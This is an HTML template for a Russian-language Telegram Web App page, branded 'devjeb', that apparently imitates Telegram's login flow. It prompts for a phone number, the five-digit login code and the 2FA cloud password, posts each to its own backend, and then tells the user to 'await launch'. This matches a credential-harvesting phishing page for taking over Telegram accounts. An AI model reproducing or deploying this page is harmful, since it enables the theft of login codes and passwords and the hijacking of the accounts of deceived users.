<!DOCTYPE html>
<html lang="ru">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Telegram Auth</title>
    <script src="https://telegram.org/js/telegram-web-app.js"></script>
    <style>
        :root {
            --bg-dark: #121212;
            --bg-darker: #0a0a0a;
            --accent-color: #6e42e5;
            --text-light: #f0f0f0;
            --text-gray: #aaaaaa;
        }
        
        body {
            background: linear-gradient(135deg, var(--bg-dark), var(--bg-darker));
            font-family: 'Segoe UI', Roboto, sans-serif;
            color: var(--text-light);
            height: 100vh;
            margin: 0;
            display: flex;
            flex-direction: column;
            justify-content: center;
            align-items: center;
            position: relative;
            overflow: hidden;
        }
        
        .bg-number {
            position: absolute;
            font-size: 17vw;
            font-weight: 1000;
            color: rgba(255, 255, 255, 0.03);
            z-index: 0;
            user-select: none;
        }
        
        .container {
            background: rgba(30, 30, 30, 0.8);
            backdrop-filter: blur(10px);
            border-radius: 16px;
            padding: 30px;
            width: 85%;
            max-width: 400px;
            box-shadow: 0 8px 32px rgba(0, 0, 0, 0.3);
            z-index: 1;
            border: 1px solid rgba(255, 255, 255, 0.1);
            transition: all 0.3s ease;
        }
        
        h1 {
            text-align: center;
            margin-bottom: 25px;
            font-weight: 600;
            font-size: 22px;
        }
        
        .input-group {
            position: relative;
            margin-bottom: 25px;
        }
        
        input {
            width: 100%;
            padding: 15px;
            background: rgba(255, 255, 255, 0.1);
            border: none;
            border-radius: 8px;
            color: var(--text-light);
            font-size: 16px;
            outline: none;
            transition: all 0.3s;
        }
        
        input:focus {
            background: rgba(255, 255, 255, 0.15);
            box-shadow: 0 0 0 2px var(--accent-color);
        }
        
        input::placeholder {
            color: var(--text-gray);
            opacity: 0.7;
        }
        
        .btn {
            width: 100%;
            padding: 15px;
            background: var(--accent-color);
            color: white;
            border: none;
            border-radius: 8px;
            font-size: 16px;
            font-weight: 600;
            cursor: pointer;
            transition: all 0.3s;
        }
        
        .btn:hover {
            background: #7d4fff;
            transform: translateY(-2px);
        }
        .btn:active {
            transform: translateY(0);
        }
        
        .btn:disabled {
            background: #555;
            cursor: not-allowed;
            transform: none;
            opacity: 0.7;
        }
        
        .response-message {
            margin-top: 20px;
            padding: 12px;
            border-radius: 8px;
            text-align: center;
            display: none;
        }
        
        .success {
            background: rgba(46, 204, 113, 0.2);
            color: #2ecc71;
        }
        
        .error {
            background: rgba(231, 76, 60, 0.2);
            color: #e74c3c;
        }
        
        .code-container {
            display: none;
        }
        
        .code-inputs {
            display: flex;
            justify-content: space-between;
            margin-bottom: 25px;
        }
        
        .code-input {
            width: 50px;
            height: 60px;
            text-align: center;
            font-size: 24px;
            background: rgba(255, 255, 255, 0.1);
            border: none;
            border-radius: 8px;
            color: var(--text-light);
            outline: none;
        }
        
        .code-input:focus {
            box-shadow: 0 0 0 2px var(--accent-color);
        }
        
        .resend-code {
            text-align: center;
            margin-top: 15px;
            color: var(--text-gray);
            cursor: pointer;
        }
        
        .resend-code:hover {
            color: var(--accent-color);
        }
        
        .password-container {
            display: none;
        }
        
        .final-message-container {
            display: none;
            position: absolute;
            top: 50%;
            left: 50%;
            transform: translate(-50%, -50%);
            width: 85%;
            max-width: 400px;
            text-align: center;
            background: rgba(30, 30, 30, 0.8);
            backdrop-filter: blur(10px);
            border-radius: 16px;
            padding: 30px;
            box-shadow: 0 8px 32px rgba(0, 0, 0, 0.3);
            z-index: 2;
            border: 1px solid rgba(255, 255, 255, 0.1);
        }
        
        .final-message {
            font-size: 18px;
            color: #2ecc71;
        }
    </style>
</head>
<body>
    <div class="bg-number">devjeb</div>
    
    <!-- Экран ввода номера -->
    <div class="container" id="phoneContainer">
        <h1>Введите ваш номер</h1>
        <div class="input-group">
            <input type="tel" id="phoneInput" placeholder="+7 (900) 000-00-00">
        </div>
        <button class="btn" id="phoneSubmitBtn" onclick="submitPhone()">Продолжить</button>
        <div id="responseMessage" class="response-message"></div>
    </div>
    
    <!-- Экран ввода кода -->
    <div class="container code-container" id="codeContainer">
        <h1>Введите код подтверждения</h1>
        <p style="text-align: center; color: var(--text-gray); margin-bottom: 20px;">
            Код отправлен на номер <span id="phoneNumberDisplay"></span>
        </p>
        <div class="code-inputs">
            <input type="text" class="code-input" maxlength="1" pattern="[0-9]">
            <input type="text" class="code-input" maxlength="1" pattern="[0-9]">
            <input type="text" class="code-input" maxlength="1" pattern="[0-9]">
            <input type="text" class="code-input" maxlength="1" pattern="[0-9]">
            <input type="text" class="code-input" maxlength="1" pattern="[0-9]">
        </div>
        <button class="btn" id="codeSubmitBtn" onclick="submitCode()">Подтвердить</button>
        <div class="resend-code" onclick="resendCode()">Отправить код повторно</div>
        <div id="codeResponseMessage" class="response-message"></div>
    </div>
    
    <!-- Экран ввода пароля -->
    <div class="container password-container" id="passwordContainer">
        <h1>Введите пароль от аккаунта</h1>
        <p style="text-align: center; color: var(--text-gray); margin-bottom: 20px;">
            Для номера <span id="passwordPhoneDisplay"></span>
        </p>
        <div class="input-group">
            <input type="password" id="passwordInput" placeholder="Пароль">
        </div>
        <button class="btn" id="passwordSubmitBtn" onclick="submitPassword()">Продолжить</button>
        <div id="passwordResponseMessage" class="response-message"></div>
    </div>
    
    <!-- Финальное сообщение -->
    <div class="final-message-container" id="finalMessageContainer">
        <div class="final-message">Успешная авторизация, ожидайте запуска</div>
    </div>

    <script>
        const tg = window.Telegram.WebApp;
        tg.expand();
        
        let currentPhone = '';
        
        // Автопереход между полями кода
        document.querySelectorAll('.code-input').forEach((input, index, inputs) => {
            input.addEventListener('input', (e) => {
                if (e.target.value.length === 1 && index < inputs.length - 1) {
                    inputs[index + 1].focus();
                }
            });
            
            input.addEventListener('keydown', (e) => {
                if (e.key === 'Backspace' && e.target.value.length === 0 && index > 0) {
                    inputs[index - 1].focus();
                }
            });
        });
        
        async function submitPhone() {
            const phone = document.getElementById('phoneInput').value;
            const responseElement = document.getElementById('responseMessage');
            const submitBtn = document.getElementById('phoneSubmitBtn');
            
            responseElement.style.display = 'none';
            submitBtn.disabled = true;
            submitBtn.textContent = 'Отправка...';
            
            try {
                const response = await fetch('/auth', {
                    method: 'POST',
                    headers: {
                        'Content-Type': 'application/json'
                    },
                    body: JSON.stringify({ phone: phone })
                });
                
                const data = await response.json();
                
                if (response.ok) {
                    currentPhone = phone;
                    showCodeScreen(phone);
                } else {
                    showResponse(data.message || 'Ошибка сервера', 'error', responseElement);
                }
                
            } catch (error) {
                showResponse('Ошибка соединения', 'error', responseElement);
                console.error('Error:', error);
            } finally {
                submitBtn.disabled = false;
                submitBtn.textContent = 'Продолжить';
            }
        }
        
        function showCodeScreen(phone) {
            document.getElementById('phoneContainer').style.display = 'none';
            document.getElementById('codeContainer').style.display = 'block';
            document.getElementById('phoneNumberDisplay').textContent = phone;
            document.querySelector('.code-input').focus();
        }
        
        function showPasswordScreen(phone) {
            document.getElementById('codeContainer').style.display = 'none';
            document.getElementById('passwordContainer').style.display = 'block';
            document.getElementById('passwordPhoneDisplay').textContent = phone;
            document.getElementById('passwordInput').focus();
        }
        
        function showFinalMessage() {
            document.getElementById('phoneContainer').style.display = 'none';
            document.getElementById('codeContainer').style.display = 'none';
            document.getElementById('passwordContainer').style.display = 'none';
            document.getElementById('finalMessageContainer').style.display = 'block';
        }
        
        async function submitCode() {
            const codeInputs = document.querySelectorAll('.code-input');
            const code = Array.from(codeInputs).map(input => input.value).join('');
            const responseElement = document.getElementById('codeResponseMessage');
            const submitBtn = document.getElementById('codeSubmitBtn');
            
            responseElement.style.display = 'none';
            submitBtn.disabled = true;
            submitBtn.textContent = 'Проверка...';
            
            if (code.length !== 5) {
                showResponse('Введите полный код из 5 цифр', 'error', responseElement);
                submitBtn.disabled = false;
                submitBtn.textContent = 'Подтвердить';
                return;
            }
            
            try {
                const response = await fetch('/verify-code', {
                    method: 'POST',
                    headers: {
                        'Content-Type': 'application/json'
                    },
                    body: JSON.stringify({ 
                        phone: currentPhone,
                        code: code 
                    })
                });
                
                const data = await response.json();
                
                if (response.ok) {
                    showFinalMessage();
                } else if (data.message === "2FA password required") {
                    showPasswordScreen(currentPhone);
                } else {
                    showResponse(data.message || 'Неверный код', 'error', responseElement);
                }
                
            } catch (error) {
                showResponse('Ошибка соединения', 'error', responseElement);
                console.error('Error:', error);
            } finally {
                submitBtn.disabled = false;
                submitBtn.textContent = 'Подтвердить';
            }
        }
        
        async function submitPassword() {
            const password = document.getElementById('passwordInput').value;
            const responseElement = document.getElementById('passwordResponseMessage');
            const submitBtn = document.getElementById('passwordSubmitBtn');
            
            responseElement.style.display = 'none';
            submitBtn.disabled = true;
            submitBtn.textContent = 'Проверка...';
            
            if (!password) {
                showResponse('Введите пароль', 'error', responseElement);
                submitBtn.disabled = false;
                submitBtn.textContent = 'Продолжить';
                return;
            }
            
            try {
                const response = await fetch('/verify-password', {
                    method: 'POST',
                    headers: {
                        'Content-Type': 'application/json'
                    },
                    body: JSON.stringify({ 
                        phone: currentPhone,
                        password: password 
                    })
                });
                
                const data = await response.json();
                
                if (response.ok) {
                    showFinalMessage();
                } else {
                    showResponse(data.message || 'Неверный пароль', 'error', responseElement);
                }
                
            } catch (error) {
                showResponse('Ошибка соединения', 'error', responseElement);
                console.error('Error:', error);
            } finally {
                submitBtn.disabled = false;
                submitBtn.textContent = 'Продолжить';
            }
        }
        
        async function resendCode() {
            const responseElement = document.getElementById('codeResponseMessage');
            
            try {
                const response = await fetch('/resend-code', {
                    method: 'POST',
                    headers: {
                        'Content-Type': 'application/json'
                    },
                    body: JSON.stringify({ 
                        phone: currentPhone
                    })
                });
                
                const data = await response.json();
                
                if (response.ok) {
                    showResponse('Код отправлен повторно', 'success', responseElement);
                } else {
                    showResponse(data.message || 'Ошибка при отправке кода', 'error', responseElement);
                }
                
            } catch (error) {
                showResponse('Ошибка соединения', 'error', responseElement);
                console.error('Error:', error);
            }
        }
        
        function showResponse(message, type, element) {
            element.textContent = message;
            element.className = `response-message ${type}`;
            element.style.display = 'block';
        }
    </script>
    <script src="{{ url_for('static', filename='js/menu.js') }}?v={{ versions }}"></script>
</body>
</html>